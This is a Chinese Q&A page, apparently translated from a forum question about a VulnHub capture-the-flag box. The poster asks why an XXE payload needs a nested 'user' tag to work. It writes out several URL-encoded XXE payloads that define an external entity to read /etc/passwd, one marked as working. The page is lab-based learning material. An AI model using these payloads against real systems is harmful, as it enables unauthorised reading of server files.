问题描述
我这样做是为了捕获标志:https://blog.mzfr.me/vulnhub-writeups/2019-08-24-scare
我正在测试 xxe 的有效负载,但没有一个有效,即使在对某些字符进行 url 编码后
在我在这里发布的演练中,我看到他的有效载荷与我使用的有效载荷太相似
我发现他对查询进行了 dobble 标记,第二个标记必须是“用户”,否则它将不起作用
这是有效的payload
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+root+[<!ENTITY+test+SYstem+'file%3a///etc/passwd'>]><root><user>%26test%3b</user></root>
这里是一些我使用过但没有用的有效载荷
%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYstem+"file%3a///etc/passwd">]><xxe>%26xmli%3b</xxe>
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYstem+"file%3a///etc/passwd">]><xxe><e>%26xmli%3b</e></xxe>
<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYstem+'file%3a///etc/passwd'>]><xxe><e>%26xmli%3b</e></xxe>
我的问题是: 为什么它必须是标签“用户”,我怎么知道我需要使用它? 为什么要使用 dobble 标签?
提前谢谢你,为我的英语感到抱歉
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)